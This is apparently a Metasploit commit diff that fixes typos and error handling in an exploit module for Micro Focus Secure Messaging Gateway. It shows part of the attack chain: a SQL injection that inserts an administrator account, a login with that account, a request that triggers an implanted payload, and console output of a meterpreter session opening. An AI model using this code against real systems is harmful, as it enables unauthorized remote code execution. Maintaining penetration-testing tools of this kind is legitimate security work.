Fix typos and additional updates regarding to review

2018-07-05 13:33:40 +01:00 · 2018-07-05 13:33:40 +01:00 · a272dcabd7
parent 3b8149216f
commit a272dcabd7
2 changed files with 15 additions and 12 deletions
--- a/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
+++ b/documentation/modules/exploit/linux/http/microfocus_secure_messaging_gateway.md
@ -7,7 +7,7 @@ Combining these vulnerabilities gives the opportunity execute operation system c
        
 **Vulnerable Application Installation Steps**

-Complate following trial submission form. You will be able to download the product as a OVA or ISO file.
+Complete following trial submission form. You will be able to download the product as a OVA or ISO file.

 [https://www.microfocus.com/products/secure-gateway/trial/](https://www.microfocus.com/products/secure-gateway/trial/)

@ -28,7 +28,7 @@ A successful check of the exploit will look like this:
 - [ ] **Verify** that you are seeing `Successfully authenticated` in console.
 - [ ] **Verify** that you are seeing `Creating a domain with a malformed DKIM data` in console.
 - [ ] **Verify** that you are seeing `Payload is successfully implanted` in console.
- [ ] **Verify** that you are seeing `Triggerring an implanted payload` in console.
+- [ ] **Verify** that you are seeing `Triggering an implanted payload` in console.
 - [ ] **Verify** that you are getting meterpreter session.

 ## Scenarios
@ -48,7 +48,7 @@ msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run
 [+] Successfully authenticated
 [*] Creating a domain record with a malformed DKIM data
 [+] Payload is successfully implanted
-[*] Triggerring an implanted payload
+[*] Triggering an implanted payload
 [*] Sending stage (37775 bytes) to 12.0.0.25
 [*] Meterpreter session 10 opened (12.0.0.1:4444 -> 12.0.0.25:44332) at 2018-06-25 20:26:54 +0100
 [*] Cleaning up...
--- a/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
+++ b/modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote

    register_options(
      [
-        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
@ -129,8 +128,12 @@ class MetasploitModule < Msf::Exploit::Remote

    if res && res.code == 200 && res.body.include?('DbNodeId')
      # Defining as global variable since we need to access them later within clean up function.
-      @domainid  = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
-      @dkimid  = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+      begin
+        @domainid  = JSON.parse(res.body)['Nodes'][0]['DbNodeId']
+        @dkimid  = JSON.parse(res.body)['Nodes'][1]['DbNodeId']
+      rescue => e
+        fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
+      end
      print_good('Payload is successfully implanted')
    else
      something_went_wrong
@ -140,11 +143,11 @@ class MetasploitModule < Msf::Exploit::Remote
  def create_user
    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection
    # issue location where requires a valid session !
-    print_status('Creating an user with appropriate privileges')
+    print_status('Creating a user with appropriate privileges')

    # Defining as global variable since we need to access them later within clean up function.
-    @username = rand_text_alpha_lower(5 + rand(20))
-    @userid = rand_text_numeric(6 + rand(2))
+    @username = rand_text_alpha_lower(5..25)
+    @userid = rand_text_numeric(6..8)
    query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"

    execute_query(query)
@ -164,8 +167,8 @@ class MetasploitModule < Msf::Exploit::Remote
      'uri'     =>  normalize_uri(target_uri.path, 'security', 'securitygate.php'),
      'vars_post' => {
        'username' => @username,
-        'password' => rand_text_alpha_lower(5 + rand(20)),
-        'passwordmandatory' => rand_text_alpha_lower(5 + rand(20)),
+        'password' => rand_text_alpha_lower(5..25),
+        'passwordmandatory' => rand_text_alpha_lower(5..25),
        'LimitInterfaceId' => 1
      }
    )
@ -187,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
    cookie = login
    implant_payload(cookie)

-    print_status('Triggerring an implanted payload')
+    print_status('Triggering an implanted payload')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),